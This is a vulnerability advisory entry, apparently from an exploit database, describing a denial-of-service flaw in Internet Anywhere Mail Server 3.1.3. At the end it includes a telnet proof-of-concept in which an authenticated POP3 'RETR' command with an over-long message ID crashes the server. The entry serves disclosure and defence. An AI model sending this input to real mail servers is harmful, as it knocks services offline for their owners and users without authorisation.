Internet Anywhere Mail Server Denial of Service Vulnerability

vendor:

Internet Anywhere Mail Server

by:

SecurityFocus

2.1

CVSS

LOW

Denial of Service

400

CWE

Product Name: Internet Anywhere Mail Server

Affected Version From: 3.1.2003

Affected Version To: 3.1.2003

Patch Exists: NO

Related CWE: N/A

CPE: //a:truenorthsoftware:internet_anywhere_mail_server:3.1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2001

Internet Anywhere Mail Server Denial of Service Vulnerability

Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server.

Mitigation:

Restarting the mail server will resume functionality.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/982/info


Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server. 

telnet target 110
+OK POP3 Welcome to someco.com using the Internet Anywhere Mail Server Version:3.1.3. Build: 1065 by True North Software, Inc. <184.4675258510890593303@someco.com>
user username
+OK valid
pass password
+OK Authorized
RETR 11111111111